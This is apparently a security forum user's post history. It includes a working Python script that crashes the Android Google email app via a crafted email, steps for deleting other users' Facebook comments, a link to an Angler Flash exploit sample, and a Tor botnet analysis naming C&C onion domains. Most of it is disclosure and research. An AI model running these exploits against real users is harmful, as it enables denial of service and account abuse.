Everything posted by Aerosol
-
Microsoft has released three critical security patches, including fixes for flaws in Internet Explorer leaving users open to attack, in its latest Patch Tuesday update.

The Internet Explorer update is listed as 'critical' as it could be used to remotely execute code on a victim's system. "This security update resolves one publicly disclosed and 40 privately reported vulnerabilities in Internet Explorer," read Microsoft's advisory. "The most severe of these could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user."

The remaining 'critical' fixes relate to flaws in Microsoft's Windows Kernel-Mode Driver and Group Policy, some of which can also be remotely exploited. "The most severe of the [kernel] vulnerabilities could allow remote code execution if an attacker convinces a user to open a specially crafted document or visit an untrusted website that contains embedded TrueType fonts," read the advisory. "The [Group Policy] vulnerability could allow remote code execution if an attacker convinces a user with a domain-configured system to connect to an attacker-controlled network."

The February Patch Tuesday also included 'important' fixes for Windows, Office, Group Policy and Microsoft's Virtual Machine Manager. These flaws could potentially be exploited for a variety of purposes, including elevation of privileges, information disclosure and security bypasses.

Ross Barrett, senior manager of security engineering at Rapid7, highlighted the Virtual Machine Manager update as the most interesting of the 'important' fixes. "Hypervisor and virtual machine management applications are often overlooked in routine patching and can be a challenge for administrators to locate on their network," he said. "Those going to patch may find the system requires an update rollup or other patches prior to this patch being offered, which could hide a vulnerable state."

Internet Explorer has been a constant source of security problems over the past year. Researcher David Leo uncovered a new Internet Explorer zero-day vulnerability affecting Windows 7 and Windows 8.1 earlier in February. Microsoft issued 200 updates in 2014 fixing a multitude of bugs in the ageing browser.

Source
-
Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Download
-
Summary: A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform a Denial Of Service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash; just receiving the malicious email is enough. CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer versions 4.2.2.0400 are not affected.

Details and proof of concept exploit at: http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html

Regards,
Hector Marco.
http://hmarco.org

----------------

Exploit crash_Android_Google_email_4.2.2.0200.py:

```python
#!/usr/bin/python
'''
 * $FILE: crash_Android_Google_email_4.2.2.0200.py
 *
 * $VERSION$
 *
 * Authors: Hector Marco <hecmargi@upv.es>
 *          Ismael Ripoll <iripoll@disca.upv.es>
 *
 * Date: Released 07 Jan 2015
 *
 * Attack details: http://hmarco.org
 *
 * $LICENSE:
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
'''
import smtplib
from smtplib import SMTPException
import sys
import getopt

#### START CONFIGURE #####
smtpServer = ""       # set an appropriate SMTP server
smtpServerPort = 25   # SMTP port, default 25
#### END CONFIGURE #####

sender = ''
receivers = []


def usage():
    print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0]
    sys.exit(2)


def smtpNotConfigured():
    print '\n[-] Error: Edit this script and set a SMTP server to send emails\n'
    sys.exit(2)


def printHeader():
    print "\nEmail Android Google 4.2.2.0200 crasher"
    print "======================================="
    print "Author: Hector Marco <hmarco@hmarco.org>"
    print "Website: http://hmarco.org"


def main(argv):
    global sender
    global receivers
    try:
        # long option names must match the values checked below
        opts, args = getopt.getopt(argv, "hs:r:", ["sender=", "receiver="])
        if len(sys.argv) == 1:
            usage()
    except getopt.GetoptError:
        usage()
    for opt, arg in opts:
        if opt == '-h':
            usage()
        elif opt in ("-s", "--sender"):
            sender = arg
        elif opt in ("-r", "--receiver"):
            receivers.append(arg)
    # both addresses are required; avoid an IndexError on receivers[0] below
    if not sender or not receivers:
        usage()


if __name__ == "__main__":
    printHeader()
    if len(smtpServer) == 0:
        smtpNotConfigured()
    main(sys.argv[1:])

    # the crafted part is the empty Content-Disposition header value
    message = "From: Sender <%s>\n" % sender
    message += "To: Receiver <%s>\n" % receivers[0]
    message += """Subject: Crash test
Content-Type: text/plain
Content-Transfer-Encoding: 8BIT
Content-Disposition: ;

"""
    print "\n[+] Sending crafted message to: %s" % receivers[0]
    try:
        smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort))
        smtpObj.sendmail(sender, receivers, message)
        print "[+] Malicious email successfully sent."
    except SMTPException:
        print "[-] Error: unable to send the email. Invalid SMTP server ???"
        sys.exit(2)
```

Source
-
- WordPress Easing Slider 2.2.0.6 Cross Site Scripting
- WordPress Ninja Forms 2.8.8 Cross Site Scripting
- WordPress Video Gallery 2.7 SQL Injection
- WordPress Survey And Poll 1.1.7 Blind SQL Injection
- WordPress Photo Gallery 1.2.5 Unrestricted File Upload
- WordPress Fusion 1.9.1 Arbitrary File Upload
- WordPress Image Metadata Cruncher Cross Site Scripting
- WordPress Image Metadata Cruncher CSRF / XSS
- WordPress Duplicator 0.5.8 Privilege Escalation
-
CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3, 5.0.5, 4.2.2, 3.8.7, 3.6.7, 3.6.0, 3.5.4
Tested Version: 5.1.3, 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
  CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
  Impact Subscore: 2.9
  Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

Advisory Details:

(1) Vendor & Product Description:

Vendor: vBulletin
Product & Version: vBulletin Forum 5.1.3, 5.0.5, 4.2.2, 3.8.7, 3.6.7, 3.6.0, 3.5.4
Vendor URL & Download: vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/

Product Introduction:
"vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server."
"Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3."

(2) Vulnerability Details:

vBulletin has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at the "forum/help" page. Add a "hash symbol" first. Then add the script at the end of it.
--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

Source
-
Document Title:
===============
Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1432
Facebook Security ID: 10202805822321483
Video: https://www.youtube.com/watch?v=SAr2AGLrBkQ
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/03/facebook-security-12500-bug-bounty-reward-security-researcher

Release Date:
=============
2015-02-03

Vulnerability Laboratory ID (VL-ID):
====================================
1432

Common Vulnerability Scoring System:
====================================
9.1

Product & Service Introduction:
===============================
Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website's membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile.
Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as "People From Work" or "Close Friends". As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site's terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade "best-of" list, saying, "How on earth did we stalk our exes, remember our co-workers' birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?" Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a session manipulation vulnerability and csrf bug in the official Facebook online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-02-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Facebook
Product: Framework - Content Management System 2015 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A remote session validation vulnerability and cross site request forgery bug has been discovered in the official Facebook online service web-application. The vulnerability allows executing functions without secure validation to compromise user content in the online service web-application of facebook.

The vulnerability is located in the comment id and legacy id of the comments function. Remote attackers with low privileged user accounts are able to delete postings of other users without authorization. The attacker can intercept the session and exchange the comment and legacy id to delete or add, for example, comments. The issue is known as critical and imposes a high risk on other user accounts. To manipulate, the attacker needs to intercept the session to manipulate the legacy and comment ids.

The security risk of the session validation vulnerability and csrf issue is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1. Exploitation of the vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the vulnerability results in unauthorized deletion or addition of user content in the comments function of facebook.

Vulnerable Module(s):
[+] Comments

Vulnerable Parameter(s):
[+] comment_id
[+] legacy id

Proof of Concept (PoC):
=======================
The session manipulation vulnerability can be exploited by remote attackers with a low privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...

01. Login to your facebook account
02. Put a comment anywhere on a random post
03. Remove your comment by usage of the standard function in facebook
04. Capture the header information of the delete request
05. Go to the victim account (any account, not a friend or their friends) because the issue works for both
06. Like his comment and capture the request by intercepting the values
07. Change your comment id to the victim's comment id and change the legacy id
08. Replay the tampered request with the manipulated values
09. Now the comment will be removed without authorization
10. Successful reproduction of the security vulnerability that allows deleting any comment of other users. thanks!

Solution - Fix & Patch:
=======================
The vulnerability has been patched in the year 2014 by the facebook developer team. The issue was allowed to be released in 2015 Q1. The researcher received a reward of $12,500 from the bug bounty program of the facebook whitehat team.

Security Risk:
==============
The security risk of the security vulnerability in the facebook framework is estimated as critical. (CVSS 9.1)

Credits & Authors:
==================
Joe Balhis (https://www.facebook.com/joe.balhis)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source
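As an added example (not from the advisory and not Facebook's code), the authorization gap the steps above describe, in a minimal Python handler: a deletion routine that trusts the request's comment_id and legacy_id, beside a hardened one that binds the request to a session-bound anti-CSRF token and decides ownership server-side. The comment store, session ids and server secret are constructed.

```python
import hashlib
import hmac
from typing import Dict

# Constructed in-memory comment store keyed by comment_id; the advisory's two
# request parameters (comment_id and legacy id) both appear per record.
COMMENTS: Dict[str, Dict[str, str]] = {
    "7001": {"legacy_id": "L7001", "owner": "attacker", "text": "my own comment"},
    "7002": {"legacy_id": "L7002", "owner": "victim", "text": "victim's comment"},
}

CSRF_KEY = b"constructed-server-side-secret"  # assumption: per-deployment secret


def csrf_token_for(session_id: str) -> str:
    """Bind an anti-CSRF token to one session: HMAC(session_id) under a server key."""
    return hmac.new(CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def delete_comment_vulnerable(store, session_user, comment_id, legacy_id):
    """Reproduces the flaw in the advisory: the handler trusts the ids carried
    in the request and never asks whether session_user owns the comment."""
    comment = store.get(comment_id)
    if comment is None or comment["legacy_id"] != legacy_id:
        return "not_found"
    del store[comment_id]
    return "deleted"


def delete_comment_hardened(store, session_user, session_id, csrf_token,
                            comment_id, legacy_id):
    """The two server-side checks the vulnerable handler lacks."""
    # 1. The request must carry the token bound to this session, so a forged
    #    cross-site request (which cannot read the token) is rejected first.
    if not hmac.compare_digest(csrf_token_for(session_id), csrf_token):
        return "csrf_rejected"
    comment = store.get(comment_id)
    if comment is None or comment["legacy_id"] != legacy_id:
        return "not_found"
    # 2. Authorization is decided from the server-side owner field, never from
    #    identifiers the client chose to send (swapping ids changes nothing).
    if comment["owner"] != session_user:
        return "forbidden"
    del store[comment_id]
    return "deleted"


def replay_tampered_delete(hardened: bool) -> str:
    """Replays steps 04-08 above: the attacker's own captured delete request
    with comment_id/legacy_id swapped for the victim's values."""
    store = {k: dict(v) for k, v in COMMENTS.items()}  # fresh copy per run
    attacker_session = "sess-attacker"
    if hardened:
        return delete_comment_hardened(store, "attacker", attacker_session,
                                       csrf_token_for(attacker_session),
                                       "7002", "L7002")
    return delete_comment_vulnerable(store, "attacker", "7002", "L7002")


if __name__ == "__main__":
    print("vulnerable handler:", replay_tampered_delete(hardened=False))
    print("hardened handler:  ", replay_tampered_delete(hardened=True))
```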
-
@YloveK no (I started with Kali)) Off:// and just so you know too, UBUNTU = LINUX; what you said is irrelevantly stupid... "first learn to work on Ubuntu and then move on to Linux" It's like saying (quoting the great eusimplu aka phplover) "First learn to ride a BMX and then learn to ride a bicycle" Where the hell is the logic in what you said?
-
When you brought up "Flood" you made a complete fool of yourself! I for one recommend Kali Linux. (but try to refrain from childish stuff like flooding.) Seriously, dude, seriously? FOR FUCK'S SAKE, UBUNTU IS A LINUX DISTRIBUTION (stop commenting just for the +1 if you know you're clueless and have no idea...)
-
@MazaBoY your buddy is just very lucky!
-
Flash exploit from Angler Exploit Kit.

Analyzing CVE-2015-0313 - The New Flash Player Zero Day
https://www.trustwave.com/Resources/SpiderLabs-Blog/A-New-Zero-Day-of-Adobe-Flash-CVE-2015-0313-Exploited-in-the-Wild

Download
Pass: infected

Source
-
Introduction

Botnets are still considered one of the most dangerous cyber threats. These malicious networks of compromised machines are used by cyber criminals and state-sponsored hackers for numerous activities, including DDoS attacks, spam campaigns, and financial scams. The principal problem for a botmaster is to make a botnet resilient against operations run by law enforcement. For operators it is essential to hide Command and Control servers and network traffic to avoid takeover of the malicious infrastructure. The Tor network offers a privileged environment for botmasters that could exploit the popular anonymizing network to hide the C&C servers.

Tor botnets

During the Defcon Conference in 2010, security engineer Dennis Brown discussed Tor-based botnets, highlighting the pros and cons of the choice to hide C&C servers in the Tor network. The principal advantages of Tor-based botnets are:

- Availability of Authenticated Hidden Services
- Availability of Private Tor Networks
- Possibility of Exit Node Flooding

Security researchers use traffic analysis to detect botnet activities and to localize the C&C servers. Typically they do this by using Intrusion Detection Systems and network analyzers. Once they've detected a botnet, the researchers and law enforcement have different options to eradicate it:

- Obscuration of the IP addresses assigned to the C&C server
- Cleaning of the server hosting the botnet and of the compromised hosts
- Domain name revocation
- Hosting provider de-peered

The botnet traffic is routed to the C&C server through the Tor network that encrypts it, making its analysis more difficult. Brown proposed the following two botnet models that exploit the Tor network:

- "Tor2Web proxy based model"
- "Proxy-aware malware over Tor network"

"Tor2Web proxy based model"

The routing mechanism relies on the Tor2Web proxy to redirect .onion web traffic.
The bot has to connect to the hidden service passing through the Tor2Web proxy pointing to an onion address that identifies the C&C server that remains hidden. The principal problem related to this approach is that it is easy to filter Tor2Web traffic, and a similar configuration could suffer from considerable latencies due to the Tor network that could make a botnet built with this approach unresponsive.

"Proxy-aware Malware over Tor network"

This approach is based on making use of proxy-aware malware. Due to the absence of the Tor2Web service, the bot agents have to run Tor clients on the infected hosts. The main difference with respect to the first solution is in the requirements for the bot agents and their configuration. Bots need to have SOCKS5 support to reach .onion addresses through the Tor network by loading Tor on the victims' systems. This second approach is more secure because traffic isn't routed through a proxy and it is entirely within the Tor network due to the direct connection between Bots and C&C servers. This configuration avoids traffic interception from exit nodes that are not involved in the architecture. This approach is more complex from a Bot perspective due to the complexity in managing the SOCKS5 interface and in botnet synchronization. This kind of botnet could be easily detected by the presence of Tor traffic on a network.

Strengths and weaknesses of Tor botnets

Among the strengths:

- Botnet traffic masquerades as legitimate Tor traffic
- Encryption prevents most Intrusion Detection Systems from finding botnet traffic
- P2P architecture makes botnets more resilient to take down
- Difficulty for the localization of the command and control servers (C&C)
- Hidden Services provide a Tor-specific .onion pseudo top-level domain, which is not exposed to possible sinkholing. The operator can easily move around the C&C servers just by re-using the generated private key for the Hidden Service.
Among the weaknesses:

- Complexity of botnet management
- Risk of botnet fragmentation
- Latency in the communication

Tor botnets: real cases

The Skynet botnet

One of the first examples of a Tor based botnet is the Skynet botnet that was discovered in December 2012 by experts at G-Data and Rapid7. The bot was a strain of the popular Zeus trojan, which included a Tor client for Windows and a bitcoin mining tool. The researchers at G-Data also reported that Skynet used hidden IRC services with Tor to control the malicious architecture. The Skynet botnet can fulfill different tasks such as mining bitcoin or providing bot agents to involve in illegal activities such as DDoS attacks or spam campaigns.

Figure 1 – Tor botnet

Mevade botnet

Going forward in time, we find the Mevade botnet (a.k.a Sefnit, LazyAlienBiker). In September 2013 it caused a spike in the number of Tor users, which reached 5 million active users.

Figure 2 – Tor metrics: Mevade spikes Tor users

Authors of Mevade's Tor variant appear to use the Russian language. The purpose of the botnet was the installation of adware and toolbars onto the victim's systems, mining Bitcoin and stealing sensitive information from the infected PC. Experts at TrendMicro revealed that the Mevade malware also had a "backdoor component and communicates over SSH to remote hosts" that made the agent ideal for data theft.

The Atrax crimekit

In November 2013, researchers from Danish security firm CSIS discovered a new crimekit, dubbed Atrax, which was sold in the underground market. One of the main features implemented by its authors is the ability to exploit Tor networks to communicate with Command & Control servers.
The Atrax crimekit was cheap – it was offered for $250, and among the other features implemented by its authors, there were:

- Virtual currency mining (Bitcoin mining and Litecoin mining)
- Browser data extraction
- Availability of a module to run DDoS attacks that offers complete support for both Full IPv6 and IPv4 and implements principal attack techniques including UDP Flood, TCP Flood, TCP Connect Flood, HTTP Slowloris, and many other methods.
- Data stealing, including Bitcoin wallets (such as Armory, Bitcoin-Qt, Electrum and Multibit).

Figure 3 – Atrax crimekit

The Atrax crimekit has a modular structure. The malware includes a series of add-ons that implement the functionalities described. A plugin which implements a data stealer was sold for $110, the form grabber runs for $300, and an experimental add-on for coin mining was sold for $140. It's interesting to note that the Atrax crimekit was sold with free updates, bug fixes and support. Below is a list of standard features present in the Atrax crimekit:

- Kill
- Update
- Download (over Tor), Execute (Commandline-Parameter allowed)
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory
- Install Plugin
- Installation List (A list with all installed applications)

64-bit ZeuS banking trojan using Tor network

In December 2013, security researchers at Kaspersky Lab detected a new strain of the popular Zeus trojan. The new variant was designed to operate on 64-bit, and authors enhanced the malicious code with the support of communication through the Tor network. This version of the popular banking trojan also used a web injection mechanism to steal banking credentials from the victim's browser. It was also able to steal digital certificates and implement a keystrokes feature. The authors implemented a communication mechanism with the C&C server over the Tor network, a feature that makes it more difficult for law enforcement and security firms to track botnets.
The 64-bit version of the Zeus banking trojan executes a Tor component, starting the svchost application in suspended mode and then injecting the Tor code into that process, running it in a stealth mode. The malicious traffic was routed through TCP port 9050 and the stolen data were sent to the onion domain with address egzh3ktnywjwabxb [.] onion.

"Tor.exe is launched indirectly — ZeuS starts the system svchost.exe application in suspended mode, then injects the tor.exe code into this suspended svchost.exe process, tunes the code to run properly and resumes execution of the suspended svchost," Tarakanov explains. "As a result, instead of the system svchost.exe, the process actually starts executing tor.exe," states the blog post published on SecureList.

Figure 4 – The Tor utility under the cover of the svchost.exe process creates an HTTP proxy server

Another peculiarity of the malware is that it instantiates a hidden service that creates a configuration file for every victim, which includes a unique private key for the service and an exclusive domain. The feature allows the botmaster to control the architecture via Tor.

"The botnet operator will be aware of the generated onion domain related to every infected machine as the malware informs the CnC about its tor domain name. So, when an infected machine is online the botnet operator can reach it connecting to its unique onion domain via the Tor network. One purpose of this approach is the remote control of the infected host. For example, one of these ports specifically listens to in the VNC function of ZeuS, obviously meaning that ZeuS provides remote desktop control to the operator via this port," continues the post.

This version of the Zeus trojan was able to trigger its execution after one program within a list of 100 predefined applications is started.
ChewBacca financial malware

In early 2014 the researchers at RSA discovered a variant of the banking Trojan ChewBacca that was used to steal credit card data from infected POS systems. Also in this case, the botnet was controlled by servers hidden in the Tor network. According to the experts at RSA, the botnet based on the ChewBacca POS variant was used against customers in at least 11 countries (including US, Russia, Canada and Australia) since October 25, 2013. The malware was able to steal credit card data with "keylogger" capabilities or by dumping the memory content of POS systems in search of credit card details. The bot is able to collect track 1 and track 2 data of payment cards during purchases.

"Chewbacca code was compiled with Free Pascal 2.7.1., once executed windows based system, it drops as spoolsv.exe in the startup folder and also drops a copy of Tor 0.2.3.25."

"After execution, the function "P$CHEWBACCA$_$TMYAPPLICATION_$__$$_INSTALL" is called, which drops itself as "spoolsv.exe" into the "Startup folder" (e.g. C:\Documents and Settings\All Users\Start Menu\Programs\Startup) and requests the public IP of the victim via a publicly accessible service at http://ekiga.net/ip (which is not related to the malware). Tor is dropped as "tor.exe" to the user's Temp and runs with a default listing on "localhost:9050"."

Figure 5 – ChewBacca console

The Bifrose malware

In August 2014, researchers from TrendMicro detected a new variant of the Bifrose malware leveraging the Tor network. The new variant of the Bifrose backdoor was used in a targeted attack against a device manufacturer. Bifrose has been around for many years, and it is quite easy to acquire in the underground. The malware has a data stealing ability, but it is mostly popular for its keylogging routines.
The variant detected by the malware experts at TrendMicro (detected as BKDR_BIFROSE.ZTBG-A – hash 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) leverages the Tor network to hide communications between the infected machines and the C&C server.

"What makes this variant more elusive is its ability of Tor to communicate with its command-and-control [C&C] server," reports a blog post published by TrendMicro.

The Bifrose malware was widely used by cyber criminals. In 2010 a threat actor targeted human resource (HR) personnel of different government offices, including the African Union and NATO. The Bifrose variant used in the targeted attack on the device manufacturer was able to perform the following operations, as explained in the blog post:

- Download a file
- Upload a file
- Get file details (file size, last modified time)
- Create a folder
- Delete a folder
- Open a file using ShellExecute
- Execute a command line
- Rename a file
- Enumerate all windows and their process IDs
- Close a window
- Move a window to the foreground

OnionDuke: APT Attacks exploited the Tor Network

In November 2014, the experts from F-Secure discovered a link between the crew operating a rogue Tor node used to spread OnionDuke malware and the MiniDuke APT. Just a month before, the security researcher Josh Pitts of Leviathan Security Group identified a Russian Tor exit node that was patching the binaries downloaded by the users with malware. The expert reported it to officials of the Tor Project, who flagged the Tor exit node as bad and shut it down. Further investigations on the case revealed that the threat actors that managed the node were serving malware through the explained scheme for more than a year.

Figure 7 – OnionDuke infection

The bad actors used the Tor exit node to serve a backdoor, dubbed OnionDuke, to the victim's machine with a man-in-the-middle attack in the downloading phase. Security experts at F-Secure discovered that the rogue exit node was tied to the MiniDuke criminal crew.
MiniDuke is the name of a sophisticated cyber espionage campaign discovered in 2013 by experts at Kaspersky Lab and Hungary’s Laboratory of Cryptography and System Security (CrySyS). The MiniDuke APT infected dozens of machines at government agencies across Europe. Exploiting a security flaw in Adobe software, the malicious payload is dropped once the victim opens the malicious PDF file. The malware was used by attackers to steal sensitive data from government and high profile entities. The researchers speculated that the level of sophistication and the nature of the chosen targets suggest that the attacks are part of a state-sponsored espionage campaign.

According to the experts, “OnionDuke,” the malware spread through the bogus exit node, is different from the malware used in the past by the threat actors behind the MiniDuke crew. It must be noted that all five domains contacted by OnionDuke aren’t dedicated malicious servers. Instead, they are legitimate websites compromised by threat actors.

The experts identified different samples of the malware and multiple other components of the OnionDuke malware family, which were designed to execute specific tasks like data stealing. The analysis of the various samples allowed the researchers at F-Secure to discover the link with the MiniDuke gang. The owner of the Command & Control (C&C) server used to control a sample of the OnionDuke backdoor (W32/OnionDuke.A) is the same that was involved in the MiniDuke agent. This circumstance suggests that although OnionDuke and MiniDuke are two separate strains of malware, the threat actors behind them shared the control infrastructure.

“One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel.
What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of ‘John Kasai’. Within a two-week window, ‘John Kasai’ also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke,” reports F-Secure in the blog post.

CryptoWall Ransomware is resurrected with new features

In early 2015, the researchers at Cisco’s Talos group published an analysis of a new variant of the CryptoWall ransomware that implements a series of new features, including the exploitation of the Tor anonymity network to hide its command-and-control infrastructure. The new variant of CryptoWall was improved by cyber criminals that applied the necessary modifications to its code to make it resilient to the operations of law enforcement.

Cisco’s Talos Security Intelligence and Research Group reported that the new strain of the CryptoWall ransomware is able to distinguish between 32- and 64-bit architectures and to execute different versions for each architecture and OS, including the newest versions of Mac OS X.

“The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper,” states the report.

The attack chain starts with a phishing mail that includes the CryptoWall variant in a “.zip” attachment.
The compressed archive included an exploit that relies on a Microsoft privilege escalation vulnerability (CVE-2013-3660) to compromise the target machine.

“CryptoWall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, ‘Win32k.sys Elevation of Privilege Vulnerability’ to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems.”

This new variant of CryptoWall also implements an anti-VM and anti-emulation check pass that prevents the execution in a virtualized environment for malware analysis. CryptoWall implements a multistep decryption. In the first phase, it decrypts just a first portion of code to check if it is running in a virtualized environment. If it passes the check, it then continues to decrypt. According to the Cisco researchers, the feature could be exploited to prevent the execution of the malware by adding fake entries in the file system that indicate a virtual machine is running.

Once it has infected the machine, the sample connects to the Tor servers with an encrypted SSL connection on port 443 or 9090. The C&C servers discovered by the researchers were using the following Tor URLs:

- crptarv4hcu24ijv.onion
- crptbfoi5i54ubez.onion
- crptcj7wd4oaafdl.onion

“Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC.”

Critroni ransomware

Recently a security researcher analyzed a new ransomware dubbed Critroni, which is being sold in different underground forums.
Critroni (aka CTB-Locker) is the name of a new ransomware that has been recently included in the Angler exploit kit. A detailed analysis of the ransomware was posted on “Malware.dontneedcoffee.com” by the French security researcher Kafeine. Critroni implements many functionalities, including the ability to exploit the Tor network to host its command and control.

“Placing a server in onion-domain (TOR), close to domain abuse can not be practically impossible to trace the owner and shut down the server. Connection to the server only after encryption of all files. Early Detection is not possible on the traffic, it is impossible to block the work of the locker. Blocking TOR prevents only payment the user, not the program. Analogs are connected to the server until the crypt and can block,” states the ad for the malware.

The experts explained that the success of the Critroni ransomware was helped by the takedown of the GameOver Zeus botnet managed by law enforcement last year. That botnet was in fact used by cyber criminals to serve the CryptoLocker ransomware. Around the same time in mid-June, security researchers began seeing advertisements for the Critroni ransomware on underground forums. The malware was sold for around $3,000.

The Critroni agent was initially spread exclusively in Russia; later its presence was detected in many other countries worldwide. Many criminal groups are using Critroni for their extortion activities. They used to serve the ransomware as part of the Angler exploit kit, which serves a spambot on victims’ machines. The spambot module is used by malware authors to drop a couple of other payloads. One of them is Critroni.

Critroni encrypts a variety of files on the targeted machine and then displays a dialogue box that demands a payment in Bitcoins in order to decrypt the files.

Figure 8 – Critroni ransomware

Victims have to pay the ransom within 72 hours. If they don’t have any Bitcoins, the ransomware provides detailed instructions on how to acquire them.
I2P botnet: real cases

Not only Tor network – CryptoWall 3.0 uses I2P network

The Tor network isn’t the only anonymizing network exploited by malware authors to hide their malicious infrastructure. In early 2015 a new version of the infamous CryptoWall ransomware was spotted by Microsoft, just a week after Cisco’s Talos Security Intelligence and Research Group announced the discovery of a new strain of the same malware that exploits the Tor network.

